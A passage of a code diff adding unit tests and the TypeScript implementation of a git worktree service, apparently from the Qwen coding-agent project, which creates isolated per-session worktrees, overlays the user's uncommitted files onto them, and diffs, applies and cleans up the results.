GitWorktreeService('/repo/subdir'); + + await expect(service.isGitRepository()).resolves.toBe(true); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(1, 'is-repo-root'); + expect(hoistedMockCheckIsRepo).toHaveBeenNthCalledWith(2); + }); + + it('createWorktree should create a sanitized branch and worktree path', async () => { + const service = new GitWorktreeService('/repo'); + + const result = await service.createWorktree('s1', 'Model A'); + + const expectedPath = path.join( + '/mock-qwen', + 'worktrees', + 's1', + 'worktrees', + 'model-a', + ); + expect(result.success).toBe(true); + expect(result.worktree?.branch).toBe('main-s1-model-a'); + expect(result.worktree?.path).toBe(expectedPath); + expect(hoistedMockRaw).toHaveBeenCalledWith([ + 'worktree', + 'add', + '-b', + 'main-s1-model-a', + expectedPath, + 'main', + ]); + }); + + it('setupWorktrees should fail early for colliding sanitized names', 
async () => { + const service = new GitWorktreeService('/repo'); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['Model A', 'model_a'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0]?.error).toContain('collides'); + expect(isCommandAvailable).not.toHaveBeenCalled(); + }); + + it('setupWorktrees should return system error when git is unavailable', async () => { + (isCommandAvailable as Mock).mockReturnValue({ available: false }); + const service = new GitWorktreeService('/repo'); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['model-a'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toEqual([ + { + name: 'system', + error: 'Git is not installed. Please install Git.', + }, + ]); + }); + + it('setupWorktrees should cleanup session after partial creation failure', async () => { + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree') + .mockResolvedValueOnce({ + success: true, + worktree: { + id: 's1/a', + name: 'a', + path: '/w/a', + branch: 'worktrees/s1/a', + isActive: true, + createdAt: 1, + }, + }) + .mockResolvedValueOnce({ + success: false, + error: 'boom', + }); + const cleanupSpy = vi.spyOn(service, 'cleanupSession').mockResolvedValue({ + success: true, + removedWorktrees: [], + removedBranches: [], + errors: [], + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a', 'b'], + }); + + expect(result.success).toBe(false); + expect(result.errors).toContainEqual({ name: 'b', error: 'boom' }); + expect(cleanupSpy).toHaveBeenCalledWith('s1'); + }); + + it('listWorktrees should return empty array when session dir does not exist', async () => { + const err = new Error('missing') as 
NodeJS.ErrnoException; + err.code = 'ENOENT'; + hoistedMockFsReaddir.mockRejectedValue(err); + const service = new GitWorktreeService('/repo'); + + await expect(service.listWorktrees('missing')).resolves.toEqual([]); + }); + + it('removeWorktree should fallback to fs.rm + worktree prune when git remove fails', async () => { + hoistedMockRaw + .mockRejectedValueOnce(new Error('remove failed')) + .mockResolvedValueOnce(''); + const service = new GitWorktreeService('/repo'); + + const result = await service.removeWorktree('/w/a'); + + expect(result.success).toBe(true); + expect(hoistedMockFsRm).toHaveBeenCalledWith('/w/a', { + recursive: true, + force: true, + }); + expect(hoistedMockRaw).toHaveBeenNthCalledWith(2, ['worktree', 'prune']); + }); + + it('cleanupSession should remove branches from listed worktrees', async () => { + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'listWorktrees').mockResolvedValue([ + { + id: 's1/a', + name: 'a', + path: '/w/a', + branch: 'main-s1-a', + isActive: true, + createdAt: Date.now(), + }, + { + id: 's1/b', + name: 'b', + path: '/w/b', + branch: 'main-s1-b', + isActive: true, + createdAt: Date.now(), + }, + ]); + vi.spyOn(service, 'removeWorktree').mockResolvedValue({ success: true }); + + const result = await service.cleanupSession('s1'); + + expect(result.success).toBe(true); + expect(result.removedBranches).toEqual(['main-s1-a', 'main-s1-b']); + expect(hoistedMockBranch).toHaveBeenCalledWith(['-D', 'main-s1-a']); + expect(hoistedMockBranch).toHaveBeenCalledWith(['-D', 'main-s1-b']); + expect(hoistedMockRaw).toHaveBeenCalledWith(['worktree', 'prune']); + }); + + it('getWorktreeDiff should return staged raw diff without creating commits', async () => { + const service = new GitWorktreeService('/repo'); + hoistedMockDiff.mockResolvedValue('diff --git a/a.ts b/a.ts'); + + const diff = await service.getWorktreeDiff('/w/a', 'main'); + + expect(diff).toBe('diff --git a/a.ts b/a.ts'); + 
expect(hoistedMockAdd).toHaveBeenCalledWith(['--all']); + expect(hoistedMockDiff).toHaveBeenCalledWith([ + '--binary', + '--cached', + 'main', + ]); + expect(hoistedMockCommit).not.toHaveBeenCalled(); + }); + + it('applyWorktreeChanges should apply raw patch via git apply', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns the baseline commit SHA + hoistedMockRaw + .mockResolvedValueOnce('baseline-sha\n') // resolveBaseline log --grep + .mockResolvedValueOnce('') // reset (from withStagedChanges) + .mockResolvedValueOnce(''); // git apply + hoistedMockDiff.mockResolvedValueOnce('diff --git a/a.ts b/a.ts'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(true); + expect(hoistedMockAdd).toHaveBeenCalledWith(['--all']); + // Should diff against the baseline commit, not merge-base + expect(hoistedMockDiff).toHaveBeenCalledWith([ + '--binary', + '--cached', + 'baseline-sha', + ]); + + const applyCall = hoistedMockRaw.mock.calls.find( + (call) => Array.isArray(call[0]) && call[0][0] === 'apply', + ); + expect(applyCall).toBeDefined(); + // When baseline is used, --3way is omitted (target working tree + // matches the pre-image, so plain apply works cleanly). 
+ expect(applyCall?.[0]?.slice(0, 2)).toEqual([ + 'apply', + '--whitespace=nowarn', + ]); + expect(hoistedMockFsWriteFile).toHaveBeenCalled(); + expect(hoistedMockFsRm).toHaveBeenCalledWith( + expect.stringContaining('.worktree-apply-'), + { force: true }, + ); + }); + + it('applyWorktreeChanges should skip apply when patch is empty', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns baseline commit + hoistedMockRaw.mockResolvedValueOnce('baseline-sha\n'); + hoistedMockDiff.mockResolvedValueOnce(' \n'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(true); + const applyCall = hoistedMockRaw.mock.calls.find( + (call) => Array.isArray(call[0]) && call[0][0] === 'apply', + ); + expect(applyCall).toBeUndefined(); + expect(hoistedMockFsWriteFile).not.toHaveBeenCalled(); + }); + + it('applyWorktreeChanges should return error when git apply fails', async () => { + const service = new GitWorktreeService('/repo'); + // resolveBaseline returns baseline commit + hoistedMockRaw + .mockResolvedValueOnce('baseline-sha\n') // resolveBaseline + .mockResolvedValueOnce('') // reset from withStagedChanges + .mockRejectedValueOnce(new Error('apply failed')); + hoistedMockDiff.mockResolvedValueOnce('diff --git a/a.ts b/a.ts'); + + const result = await service.applyWorktreeChanges('/w/a', '/repo'); + + expect(result.success).toBe(false); + expect(result.error).toContain('apply failed'); + expect(hoistedMockFsRm).toHaveBeenCalledWith( + expect.stringContaining('.worktree-apply-'), + { force: true }, + ); + }); + + describe('dirty state propagation', () => { + function makeWorktreeInfo( + name: string, + sessionId: string, + ): { + id: string; + name: string; + path: string; + branch: string; + isActive: boolean; + createdAt: number; + } { + return { + id: `${sessionId}/${name}`, + name, + path: `/mock-qwen/worktrees/${sessionId}/worktrees/${name}`, + branch: 
`worktrees/${sessionId}/${name}`, + isActive: true, + createdAt: 1, + }; + } + + it('setupWorktrees should apply dirty state snapshot to each worktree', async () => { + hoistedMockStash.mockResolvedValue('snapshot-sha\n'); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree') + .mockResolvedValueOnce({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }) + .mockResolvedValueOnce({ + success: true, + worktree: makeWorktreeInfo('b', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a', 'b'], + }); + + expect(result.success).toBe(true); + expect(hoistedMockStash).toHaveBeenCalledWith(['create']); + // stash apply should be called once per worktree + const stashApplyCalls = hoistedMockRaw.mock.calls.filter( + (call: unknown[]) => + Array.isArray(call[0]) && + call[0][0] === 'stash' && + call[0][1] === 'apply', + ); + expect(stashApplyCalls).toHaveLength(2); + expect(stashApplyCalls[0]![0]).toEqual([ + 'stash', + 'apply', + 'snapshot-sha', + ]); + }); + + it('setupWorktrees should skip stash apply when working tree is clean', async () => { + hoistedMockStash.mockResolvedValue('\n'); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + expect(result.success).toBe(true); + const stashApplyCalls = hoistedMockRaw.mock.calls.filter( + (call: unknown[]) => + Array.isArray(call[0]) && + call[0][0] === 'stash' && + call[0][1] === 'apply', + ); + expect(stashApplyCalls).toHaveLength(0); + }); + + it('setupWorktrees should still succeed when stash apply fails', async () => { + 
hoistedMockStash.mockResolvedValue('snapshot-sha\n'); + hoistedMockRaw.mockRejectedValue(new Error('stash apply conflict')); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + // Setup should still succeed — dirty state failure is non-fatal + expect(result.success).toBe(true); + expect(result.errors).toHaveLength(0); + }); + + it('setupWorktrees should still succeed when stash create fails', async () => { + hoistedMockStash.mockRejectedValue(new Error('stash create failed')); + const service = new GitWorktreeService('/repo'); + vi.spyOn(service, 'isGitRepository').mockResolvedValue(true); + vi.spyOn(service, 'createWorktree').mockResolvedValue({ + success: true, + worktree: makeWorktreeInfo('a', 's1'), + }); + + const result = await service.setupWorktrees({ + sessionId: 's1', + sourceRepoPath: '/repo', + worktreeNames: ['a'], + }); + + // Setup should still succeed — stash create failure is non-fatal + expect(result.success).toBe(true); + expect(result.errors).toHaveLength(0); + }); + }); +}); diff --git a/packages/core/src/services/gitWorktreeService.ts b/packages/core/src/services/gitWorktreeService.ts new file mode 100644 index 000000000..6ceebf11e --- /dev/null +++ b/packages/core/src/services/gitWorktreeService.ts @@ -0,0 +1,826 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { execSync } from 'node:child_process'; +import { simpleGit, CheckRepoActions } from 'simple-git'; +import type { SimpleGit } from 'simple-git'; +import { Storage } from '../config/storage.js'; +import { isCommandAvailable } from 
'../utils/shell-utils.js'; +import { isNodeError } from '../utils/errors.js'; + +/** + * Commit message used for the baseline snapshot in worktrees. + * After overlaying the user's dirty state (tracked changes + untracked files), + * a commit with this message is created so that later diffs only capture the + * agent's changes — not the pre-existing local edits. + */ +export const BASELINE_COMMIT_MESSAGE = 'baseline (dirty state overlay)'; + +/** + * Default directory and branch-prefix name used for worktrees. + * Changing this value affects the on-disk layout (`~/.qwen/<WORKTREES_DIR>/`) + * **and** the default git branch prefix (`<WORKTREES_DIR>/<sessionId>/…`). + */ +export const WORKTREES_DIR = 'worktrees'; + +export interface WorktreeInfo { + /** Unique identifier for this worktree */ + id: string; + /** Display name (e.g., model name) */ + name: string; + /** Absolute path to the worktree directory */ + path: string; + /** Git branch name for this worktree */ + branch: string; + /** Whether the worktree is currently active */ + isActive: boolean; + /** Creation timestamp */ + createdAt: number; +} + +export interface WorktreeSetupConfig { + /** Session identifier */ + sessionId: string; + /** Source repository path (project root) */ + sourceRepoPath: string; + /** Names/identifiers for each worktree to create */ + worktreeNames: string[]; + /** Base branch to create worktrees from (defaults to current branch) */ + baseBranch?: string; + /** Extra metadata to persist alongside the session config */ + metadata?: Record<string, unknown>; +} + +export interface CreateWorktreeResult { + success: boolean; + worktree?: WorktreeInfo; + error?: string; +} + +export interface WorktreeSetupResult { + success: boolean; + sessionId: string; + worktrees: WorktreeInfo[]; + worktreesByName: Record<string, WorktreeInfo>; + errors: Array<{ name: string; error: string }>; +} + +/** + * Minimal session config file written to disk. + * Callers can extend via the `metadata` field in WorktreeSetupConfig.
+ */
+interface SessionConfigFile {
+  sessionId: string;
+  sourceRepoPath: string;
+  worktreeNames: string[];
+  baseBranch?: string;
+  createdAt: number;
+  // Extra keys come from the caller-supplied metadata spread into the file.
+  [key: string]: unknown;
+}
+
+/**
+ * Service for managing git worktrees.
+ *
+ * Git worktrees allow multiple working directories to share a single repository,
+ * enabling isolated environments without copying the entire repo.
+ */
+export class GitWorktreeService {
+  /** Absolute path of the source repository (resolved in the constructor). */
+  private sourceRepoPath: string;
+  /** simple-git handle bound to the source repository. */
+  private git: SimpleGit;
+  /** Optional override for the worktree base directory. */
+  private readonly customBaseDir?: string;
+
+  /**
+   * @param sourceRepoPath - Path to the source repository; resolved to an
+   *   absolute path before use.
+   * @param customBaseDir - Optional base directory that replaces the default
+   *   location under the global Qwen dir.
+   */
+  constructor(sourceRepoPath: string, customBaseDir?: string) {
+    this.sourceRepoPath = path.resolve(sourceRepoPath);
+    this.git = simpleGit(this.sourceRepoPath);
+    this.customBaseDir = customBaseDir;
+  }
+
+  /**
+   * Gets the directory where worktrees are stored.
+   * @param customDir - Optional custom base directory override
+   * @returns The resolved custom directory when given, otherwise
+   *   `WORKTREES_DIR` under the global Qwen dir.
+   */
+  static getBaseDir(customDir?: string): string {
+    if (customDir) {
+      return path.resolve(customDir);
+    }
+    return path.join(Storage.getGlobalQwenDir(), WORKTREES_DIR);
+  }
+
+  /**
+   * Gets the directory for a specific session.
+   * @param sessionId - Session identifier, used as the directory name
+   * @param customBaseDir - Optional custom base directory override
+   */
+  static getSessionDir(sessionId: string, customBaseDir?: string): string {
+    return path.join(GitWorktreeService.getBaseDir(customBaseDir), sessionId);
+  }
+
+  /**
+   * Gets the worktrees directory for a specific session.
+   * @param sessionId - Session identifier
+   * @param customBaseDir - Optional custom base directory override
+   */
+  static getWorktreesDir(sessionId: string, customBaseDir?: string): string {
+    return path.join(
+      GitWorktreeService.getSessionDir(sessionId, customBaseDir),
+      WORKTREES_DIR,
+    );
+  }
+
+  /**
+   * Instance-level base dir, using the custom dir if provided at construction.
+   */
+  getBaseDirForInstance(): string {
+    return GitWorktreeService.getBaseDir(this.customBaseDir);
+  }
+
+  /**
+   * Checks if git is available on the system.
+   * @returns `{ available: true }` when the `git` command is found, otherwise
+   *   `{ available: false, error }` with an install hint.
+   */
+  async checkGitAvailable(): Promise<{ available: boolean; error?: string }> {
+    const { available } = isCommandAvailable('git');
+    if (!available) {
+      return {
+        available: false,
+        error: 'Git is not installed. Please install Git.',
+      };
+    }
+    return { available: true };
+  }
+
+  /**
+   * Checks if the source path is a git repository.
+   * Returns true when the path is a repository root or lies inside one;
+   * never throws.
+   */
+  async isGitRepository(): Promise<boolean> {
+    try {
+      const isRoot = await this.git.checkIsRepo(CheckRepoActions.IS_REPO_ROOT);
+      if (isRoot) {
+        return true;
+      }
+    } catch {
+      // IS_REPO_ROOT check failed — fall through to the general check
+    }
+    // Not the root (or root check threw) — check if we're inside a git repo
+    try {
+      return await this.git.checkIsRepo();
+    } catch {
+      return false;
+    }
+  }
+
+  /**
+   * Initializes the source directory as a git repository.
+   * Returns true if initialization was performed, false if already a repo.
+   * Failures are reported through the `error` field instead of throwing.
+   */
+  async initializeRepository(): Promise<{
+    initialized: boolean;
+    error?: string;
+  }> {
+    const isRepo = await this.isGitRepository();
+    if (isRepo) {
+      return { initialized: false };
+    }
+
+    try {
+      await this.git.init(false, { '--initial-branch': 'main' });
+
+      // Create initial commit so we can create worktrees
+      await this.git.add('.');
+      await this.git.commit('Initial commit', {
+        '--allow-empty': null,
+      });
+
+      return { initialized: true };
+    } catch (error) {
+      return {
+        initialized: false,
+        error: `Failed to initialize git repository: ${error instanceof Error ? error.message : 'Unknown error'}`,
+      };
+    }
+  }
+
+  /**
+   * Gets the current branch name.
+   * This is the trimmed output of `git rev-parse --abbrev-ref HEAD`.
+   */
+  async getCurrentBranch(): Promise<string> {
+    const branch = await this.git.revparse(['--abbrev-ref', 'HEAD']);
+    return branch.trim();
+  }
+
+  /**
+   * Gets the current commit hash.
+   */
+  async getCurrentCommitHash(): Promise<string> {
+    const hash = await this.git.revparse(['HEAD']);
+    return hash.trim();
+  }
+
+  /**
+   * Creates a single worktree.
+   *
+   * The worktree is placed under the session's worktrees directory and gets
+   * a new branch named `{base}-{first 6 chars of sessionId}-{sanitizedName}`.
+   *
+   * @param sessionId - Session the worktree belongs to
+   * @param name - Display name; sanitized for use as directory/branch suffix
+   * @param baseBranch - Branch to start from (defaults to the current branch)
+   * @returns `success: true` with the worktree info, or `success: false`
+   *   with an error message. Never throws.
+   */
+  async createWorktree(
+    sessionId: string,
+    name: string,
+    baseBranch?: string,
+  ): Promise<CreateWorktreeResult> {
+    try {
+      // Sanitize name for use as branch and directory name
+      const sanitizedName = this.sanitizeName(name);
+      if (!sanitizedName) {
+        // An empty name would resolve to the worktrees directory itself and
+        // be misreported as "already exists".
+        return {
+          success: false,
+          error: `Failed to create worktree for "${name}": Worktree name becomes empty after sanitization`,
+        };
+      }
+
+      const worktreesDir = GitWorktreeService.getWorktreesDir(
+        sessionId,
+        this.customBaseDir,
+      );
+      await fs.mkdir(worktreesDir, { recursive: true });
+
+      const worktreePath = path.join(worktreesDir, sanitizedName);
+
+      // Check if worktree already exists
+      const exists = await this.pathExists(worktreePath);
+      if (exists) {
+        return {
+          success: false,
+          error: `Worktree already exists at ${worktreePath}`,
+        };
+      }
+
+      // Determine base branch
+      const base = baseBranch || (await this.getCurrentBranch());
+      const shortSession = sessionId.slice(0, 6);
+      const branchName = `${base}-${shortSession}-${sanitizedName}`;
+
+      // Create the worktree with a new branch
+      await this.git.raw([
+        'worktree',
+        'add',
+        '-b',
+        branchName,
+        worktreePath,
+        base,
+      ]);
+
+      const worktree: WorktreeInfo = {
+        id: `${sessionId}/${sanitizedName}`,
+        name,
+        path: worktreePath,
+        branch: branchName,
+        isActive: true,
+        createdAt: Date.now(),
+      };
+
+      return { success: true, worktree };
+    } catch (error) {
+      return {
+        success: false,
+        error: `Failed to create worktree for "${name}": ${error instanceof Error ? error.message : 'Unknown error'}`,
+      };
+    }
+  }
+
+  /**
+   * Sets up all worktrees for a session.
+   * This is the main entry point for worktree creation.
+   *
+   * Steps: validate names, check git and the repository, write the session
+   * config, create one worktree per name, then overlay the source repo's
+   * dirty state (tracked changes + untracked files) onto each worktree and
+   * record it as a baseline commit. If any worktree fails to be created the
+   * whole session is cleaned up and `success` is false.
+   *
+   * @param config - Session id, source path, worktree names and options
+   * @returns The created worktrees and any errors encountered
+   */
+  async setupWorktrees(
+    config: WorktreeSetupConfig,
+  ): Promise<WorktreeSetupResult> {
+    const result: WorktreeSetupResult = {
+      success: false,
+      sessionId: config.sessionId,
+      worktrees: [],
+      worktreesByName: {},
+      errors: [],
+    };
+
+    // Validate worktree names early (before touching git)
+    const sanitizedNames = new Map<string, string>();
+    for (const name of config.worktreeNames) {
+      const sanitized = this.sanitizeName(name);
+      if (!sanitized) {
+        result.errors.push({
+          name,
+          error: 'Worktree name becomes empty after sanitization',
+        });
+        continue;
+      }
+      const existing = sanitizedNames.get(sanitized);
+      if (existing) {
+        result.errors.push({
+          name,
+          error: `Worktree name collides with "${existing}" after sanitization`,
+        });
+        continue;
+      }
+      sanitizedNames.set(sanitized, name);
+    }
+    if (result.errors.length > 0) {
+      return result;
+    }
+
+    // Check git availability
+    const gitCheck = await this.checkGitAvailable();
+    if (!gitCheck.available) {
+      result.errors.push({ name: 'system', error: gitCheck.error! });
+      return result;
+    }
+
+    // Ensure source is a git repository
+    const isRepo = await this.isGitRepository();
+    if (!isRepo) {
+      result.errors.push({
+        name: 'repository',
+        error: 'Source path is not a git repository.',
+      });
+      return result;
+    }
+
+    // Create session directory
+    const sessionDir = GitWorktreeService.getSessionDir(
+      config.sessionId,
+      this.customBaseDir,
+    );
+    await fs.mkdir(sessionDir, { recursive: true });
+
+    // Save session config for later reference
+    const configPath = path.join(sessionDir, 'config.json');
+    const configFile: SessionConfigFile = {
+      sessionId: config.sessionId,
+      sourceRepoPath: config.sourceRepoPath,
+      worktreeNames: config.worktreeNames,
+      baseBranch: config.baseBranch,
+      createdAt: Date.now(),
+      ...config.metadata,
+    };
+    await fs.writeFile(configPath, JSON.stringify(configFile, null, 2));
+
+    // Capture the current dirty state (tracked: staged + unstaged changes)
+    // without modifying the source working tree or index.
+    // NOTE: `git stash create` does NOT support --include-untracked;
+    // untracked files are handled separately below via file copy.
+    let dirtyStateSnapshot = '';
+    try {
+      dirtyStateSnapshot = (await this.git.stash(['create'])).trim();
+    } catch {
+      // Ignore — proceed without dirty state if stash create fails
+    }
+
+    // Discover untracked files so they can be copied into each worktree.
+    // `git ls-files --others --exclude-standard` is read-only and safe.
+    // `-z` makes git emit NUL-terminated, unquoted paths; without it paths
+    // containing non-ASCII or special characters are C-quoted and could not
+    // be found on disk when copying.
+    let untrackedFiles: string[] = [];
+    try {
+      const raw = await this.git.raw([
+        'ls-files',
+        '--others',
+        '--exclude-standard',
+        '-z',
+      ]);
+      untrackedFiles = raw.split('\0').filter(Boolean);
+    } catch {
+      // Non-fatal: proceed without untracked files
+    }
+
+    // Create worktrees for each entry
+    for (const name of config.worktreeNames) {
+      const createResult = await this.createWorktree(
+        config.sessionId,
+        name,
+        config.baseBranch,
+      );
+
+      if (createResult.success && createResult.worktree) {
+        result.worktrees.push(createResult.worktree);
+        result.worktreesByName[name] = createResult.worktree;
+      } else {
+        result.errors.push({
+          name,
+          error: createResult.error || 'Unknown error',
+        });
+      }
+    }
+
+    // If any worktree failed, clean up all created resources and fail
+    if (result.errors.length > 0) {
+      try {
+        await this.cleanupSession(config.sessionId);
+      } catch (error) {
+        result.errors.push({
+          name: 'cleanup',
+          error: `Failed to cleanup after partial worktree creation: ${error instanceof Error ? error.message : 'Unknown error'}`,
+        });
+      }
+      result.success = false;
+      return result;
+    }
+
+    // Success only if all worktrees were created
+    result.success = result.worktrees.length === config.worktreeNames.length;
+
+    // Overlay the source repo's dirty state onto each worktree so agents
+    // see the same files the user currently has on disk.
+    if (result.success) {
+      for (const worktree of result.worktrees) {
+        const wtGit = simpleGit(worktree.path);
+
+        // 1. Apply tracked dirty changes (staged + unstaged)
+        if (dirtyStateSnapshot) {
+          try {
+            await wtGit.raw(['stash', 'apply', dirtyStateSnapshot]);
+          } catch {
+            // Non-fatal: worktree still usable with committed state only
+          }
+        }
+
+        // 2. Copy untracked files into the worktree
+        for (const relPath of untrackedFiles) {
+          try {
+            const src = path.join(this.sourceRepoPath, relPath);
+            const dst = path.join(worktree.path, relPath);
+            await fs.mkdir(path.dirname(dst), { recursive: true });
+            await fs.copyFile(src, dst);
+          } catch {
+            // Non-fatal: skip files that can't be copied
+          }
+        }
+
+        // 3. Create a baseline commit capturing the full starting state
+        // (committed + dirty + untracked). This allows us to later diff
+        // only the agent's changes, excluding the pre-existing dirty state.
+        try {
+          await wtGit.add(['--all']);
+          await wtGit.commit(BASELINE_COMMIT_MESSAGE, {
+            '--allow-empty': null,
+            '--no-verify': null,
+          });
+        } catch {
+          // Non-fatal: diff will fall back to merge-base if baseline is missing
+        }
+      }
+    }
+
+    return result;
+  }
+
+  /**
+   * Lists all worktrees for a session.
+   *
+   * Every sub-directory of the session's worktrees directory is reported as
+   * a worktree. The branch is read from the worktree itself and is an empty
+   * string when that lookup fails.
+   *
+   * @returns The worktrees found, or an empty array when the session's
+   *   worktrees directory does not exist.
+   * @throws Any other filesystem error from reading the directory.
+   */
+  async listWorktrees(sessionId: string): Promise<WorktreeInfo[]> {
+    const worktreesDir = GitWorktreeService.getWorktreesDir(
+      sessionId,
+      this.customBaseDir,
+    );
+
+    try {
+      const entries = await fs.readdir(worktreesDir, { withFileTypes: true });
+      const worktrees: WorktreeInfo[] = [];
+
+      for (const entry of entries) {
+        if (entry.isDirectory()) {
+          const worktreePath = path.join(worktreesDir, entry.name);
+
+          // Read the actual branch from the worktree
+          let branchName = '';
+          try {
+            branchName = execSync('git rev-parse --abbrev-ref HEAD', {
+              cwd: worktreePath,
+              encoding: 'utf8',
+              stdio: ['pipe', 'pipe', 'pipe'],
+            }).trim();
+          } catch {
+            // Fallback if git command fails
+          }
+
+          // Try to get stats for creation time
+          let createdAt = Date.now();
+          try {
+            const stats = await fs.stat(worktreePath);
+            createdAt = stats.birthtimeMs;
+          } catch {
+            // Ignore stat errors
+          }
+
+          worktrees.push({
+            id: `${sessionId}/${entry.name}`,
+            name: entry.name,
+            path: worktreePath,
+            branch: branchName,
+            isActive: true,
+            createdAt,
+          });
+        }
+      }
+
+      return worktrees;
+    } catch (error) {
+      if (isNodeError(error) && error.code === 'ENOENT') {
+        return [];
+      }
+      throw error;
+    }
+  }
+
+  /**
+   * Removes a single worktree.
+   * Tries `git worktree remove --force` first; if that fails, deletes the
+   * directory manually and prunes stale worktree references.
+   *
+   * @returns `success: false` with the original git error message when both
+   *   strategies fail. Never throws.
+   */
+  async removeWorktree(
+    worktreePath: string,
+  ): Promise<{ success: boolean; error?: string }> {
+    try {
+      // Remove the worktree from git
+      await this.git.raw(['worktree', 'remove', worktreePath, '--force']);
+      return { success: true };
+    } catch (error) {
+      // Try to remove the directory manually if git worktree remove fails
+      try {
+        await fs.rm(worktreePath, { recursive: true, force: true });
+        // Prune worktree references
+        await this.git.raw(['worktree', 'prune']);
+        return { success: true };
+      } catch {
+        return {
+          success: false,
+          error: `Failed to remove worktree: ${error instanceof Error ? error.message : 'Unknown error'}`,
+        };
+      }
+    }
+  }
+
+  /**
+   * Cleans up all worktrees and branches for a session.
+   *
+   * Removes every worktree of the session, deletes the session directory,
+   * deletes the branches the worktrees were on, and prunes stale worktree
+   * references. `success` is false whenever `errors` is non-empty; branch
+   * deletion and prune failures are best-effort and not reported.
+   */
+  async cleanupSession(sessionId: string): Promise<{
+    success: boolean;
+    removedWorktrees: string[];
+    removedBranches: string[];
+    errors: string[];
+  }> {
+    const result = {
+      success: true,
+      removedWorktrees: [] as string[],
+      removedBranches: [] as string[],
+      errors: [] as string[],
+    };
+
+    // Collect actual branch names from worktrees before removing them
+    const worktrees = await this.listWorktrees(sessionId);
+    const worktreeBranches = new Set(
+      worktrees.map((w) => w.branch).filter(Boolean),
+    );
+
+    // Remove all worktrees
+    for (const worktree of worktrees) {
+      const removeResult = await this.removeWorktree(worktree.path);
+      if (removeResult.success) {
+        result.removedWorktrees.push(worktree.name);
+      } else {
+        result.errors.push(
+          removeResult.error || `Failed to remove ${worktree.name}`,
+        );
+        result.success = false;
+      }
+    }
+
+    // Remove session directory
+    const sessionDir = GitWorktreeService.getSessionDir(
+      sessionId,
+      this.customBaseDir,
+    );
+    try {
+      await fs.rm(sessionDir, { recursive: true, force: true });
+    } catch (error) {
+      result.errors.push(
+        `Failed to remove session directory: ${error instanceof Error ? error.message : 'Unknown error'}`,
+      );
+      // A leftover session directory means the cleanup did not fully succeed.
+      result.success = false;
+    }
+
+    // Clean up branches that belonged to the worktrees
+    for (const branchName of worktreeBranches) {
+      try {
+        await this.git.branch(['-D', branchName]);
+        result.removedBranches.push(branchName);
+      } catch {
+        // Branch might already be deleted, ignore
+      }
+    }
+
+    // Prune worktree references
+    try {
+      await this.git.raw(['worktree', 'prune']);
+    } catch {
+      // Ignore prune errors
+    }
+
+    return result;
+  }
+
+  /**
+   * Gets the diff between a worktree and its baseline state.
+   * Prefers the baseline commit (which includes the dirty state overlay)
+   * so the diff only shows the agent's changes. Falls back to the base branch
+   * when no baseline commit exists.
+   *
+   * @param worktreePath - Path of the worktree to diff
+   * @param baseBranch - Fallback base when no baseline commit is found
+   *   (defaults to the source repo's current branch)
+   * @returns The binary-safe diff text, or a string starting with
+   *   `Error getting diff:` when the diff itself fails.
+   */
+  async getWorktreeDiff(
+    worktreePath: string,
+    baseBranch?: string,
+  ): Promise<string> {
+    const worktreeGit = simpleGit(worktreePath);
+
+    const base =
+      (await this.resolveBaseline(worktreeGit)) ??
+      baseBranch ??
+      (await this.getCurrentBranch());
+
+    try {
+      return await this.withStagedChanges(worktreeGit, () =>
+        worktreeGit.diff(['--binary', '--cached', base]),
+      );
+    } catch (error) {
+      return `Error getting diff: ${error instanceof Error ? error.message : 'Unknown error'}`;
+    }
+  }
+
+  /**
+   * Applies raw changes from a worktree back to the target working directory.
+   *
+   * Diffs from the baseline commit (which already includes the user's
+   * dirty state) so the patch only contains the agent's new changes.
+   * Falls back to merge-base when no baseline commit exists.
+   *
+   * @param worktreePath - Worktree whose changes should be applied
+   * @param targetPath - Directory to patch (defaults to the source repo)
+   * @returns `success: true` when applied or when there is nothing to apply;
+   *   otherwise `success: false` with an error message. Never throws.
+   */
+  async applyWorktreeChanges(
+    worktreePath: string,
+    targetPath?: string,
+  ): Promise<{ success: boolean; error?: string }> {
+    const target = targetPath || this.sourceRepoPath;
+    const worktreeGit = simpleGit(worktreePath);
+    const targetGit = simpleGit(target);
+
+    try {
+      // Prefer the baseline commit (created during worktree setup after
+      // overlaying dirty state) so the patch excludes pre-existing edits.
+      let base = await this.resolveBaseline(worktreeGit);
+      const hasBaseline = !!base;
+
+      if (!base) {
+        // Fallback: diff from merge-base
+        const targetHead = (await targetGit.revparse(['HEAD'])).trim();
+        base = (
+          await worktreeGit.raw(['merge-base', 'HEAD', targetHead])
+        ).trim();
+      }
+
+      const patch = await this.withStagedChanges(worktreeGit, () =>
